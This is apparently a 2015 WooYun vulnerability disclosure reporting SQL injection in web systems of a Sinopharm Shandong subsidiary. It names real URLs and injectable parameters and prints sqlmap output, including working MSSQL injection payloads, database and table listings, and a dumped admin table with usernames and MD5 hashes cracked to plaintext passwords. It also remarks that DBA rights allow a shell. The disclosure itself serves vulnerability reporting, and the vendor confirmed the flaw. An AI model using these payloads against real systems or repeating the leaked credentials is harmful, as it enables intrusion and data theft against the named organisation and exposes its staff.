当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0165869

漏洞标题:国药集团某公司n个SQL注入打包/百万数据/DBA权限可shell/影响多个站

相关厂商:国药集团

漏洞作者: 路人甲

提交时间:2015-12-30 10:37

修复时间:2016-01-22 11:14

公开时间:2016-01-22 11:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-30: 细节已通知厂商并且等待厂商处理中
2015-12-30: 厂商已经确认,细节仅向厂商公开
2016-01-09: 细节向核心白帽子及相关领域专家公开
2016-01-19: 细节向普通白帽子公开
2016-01-29: 细节向实习白帽子公开
2016-01-22: 细节向公众公开

简要描述:

详细说明:

目标站点:国药集团山东有限公司
在同一个服务器的站点:
主站:http://www.sinopharm-sd.com
国药控股网上订单系统:http://58.56.60.68:8009/websale/empLogin.aspx
OA系统:http://58.56.60.68:8088/yyoa/index.jsp
供货商:http://58.56.60.68/lxcx/tc_ghs_login.asp
电子药单查询系统:http://58.56.60.68/EYJ/querychkrpt.aspx
注入点无穷多啊:
http://www.sinopharm-sd.com/News.aspx?smallclassid=1
http://www.sinopharm-sd.com/About.aspx?smallclassid=8
http://www.sinopharm-sd.com/Tel.aspx?smallclassid=5
http://www.sinopharm-sd.com/Contact.aspx?smallclassid=14
http://www.sinopharm-sd.com/Map.aspx?smallclassid=19
http://www.sinopharm-sd.com/Yingpin.aspx?ID=13
http://www.sinopharm-sd.com/MedicinePage.aspx?smallclassid=40
http://www.sinopharm-sd.com/ifxinxi.aspx?cityid=2
来看看其中一个:http://www.sinopharm-sd.com/News.aspx?smallclassid=1
DBA权限,可以getshell

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: smallclassid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: smallclassid=1' AND 3824=3824 AND 'smgD'='smgD
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: smallclassid=1' AND 8739=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(120)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8739=8739) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(107)+CHAR(113))) AND 'rBIx'='rBIx
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: smallclassid=1';WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: smallclassid=1' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current database: 'db_gykg'
current user is DBA: True
available databases [10]:
[*] db_gykg
[*] EasyUiDB
[*] gksd_ghslx
[*] master
[*] model
[*] msdb
[*] mytest
[*] plusoft_test
[*] PresAudi_20100428
[*] tempdb


看看数据库:

Database: db_gykg
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| dbo.article | 39 |
| dbo.smallclass | 38 |
| dbo.products | 24 |
| dbo.bigclass | 23 |
| dbo.site | 18 |
| dbo.Sys_City | 18 |
| dbo.resume | 12 |
| dbo.partner | 8 |
| dbo.link | 6 |
| dbo.recruitment | 6 |
| dbo.sys_pic | 6 |
| dbo.admin | 5 |
| dbo.viewnews | 4 |
| dbo.Viewnewsbyorder | 4 |
| dbo.sys_style | 3 |
| dbo.userhy | 3 |
| dbo.admintype | 2 |
| dbo.Message | 2 |
+---------------------+---------+


Table: admin
[8 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| admincity | int |
| logintime | datetime |
| order | int |
| password | nvarchar |
| roles | varchar |
| userid | int |
| username | nvarchar |
| usertype | nvarchar |
+-----------+----------+
Database: db_gykg
Table: admin
[4 entries]
+--------+---------------------------------------------------------+---------+----------+----------+--------------------------------------------+-----------+-----------+
| userid | roles | order | username | usertype | password | admincity | logintime |
+--------+---------------------------------------------------------+---------+----------+----------+--------------------------------------------+-----------+-----------+
| 1 | 1,2,3,4,5,6,7,8,10,11,12,13,14,15,16,17,18,19,32,33,40, | <blank> | admin | 0 | 21232F297A57A5A743894A0E4A801FC3 (admin) | 0 | NULL |
| 8 | 20,21,22,23,24,25,26,27,43, | <blank> | jnadmin | 0 | 2646419C347F33F3B8D6DB98B1B94A07 (jnadmin) | 1 | NULL |
| 9 | 28, | <blank> | qdadmin | 0 | 218E14D0D206162F8875D50D519F62CF (qdadmin) | 2 | NULL |
| 10 | 35,36,37,38,39,41, | <blank> | ytadmin | 0 | 56EAB79040880107388A006E71192600 (ytadmin) | 5 | NULL |
+--------+---------------------------------------------------------+---------+----------+----------+--------------------------------------------+-----------+-----------+


大数据量来了。

Database: gksd_ghslx
+------------------+---------+
| Table | Entries |
+------------------+---------+
| dbo.TC_ghslx_mx | 4043799 |
| dbo.user_log | 1040537 |
| dbo.TC_ghsrk_mx | 725890 |
| dbo.yh_lxpz | 43231 |
| dbo.TC_kh | 40545 |
| dbo.TC_kcqd | 24471 |
| dbo.ypxx | 16298 |
| dbo.yhxx | 1846 |
| dbo.yh_group_not | 996 |
| dbo.yh_group_r | 68 |
| dbo.pbcatedt | 21 |
| dbo.pbcatfmt | 20 |
| dbo.yhxx_ghs | 20 |
| dbo.dict_owner | 14 |
| dbo.TC_news | 13 |
| dbo.yh_group | 13 |
| dbo.admin_user | 2 |
+------------------+---------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-12-30 11:11

厂商回复:

我们会尽快修复

最新状态:

暂无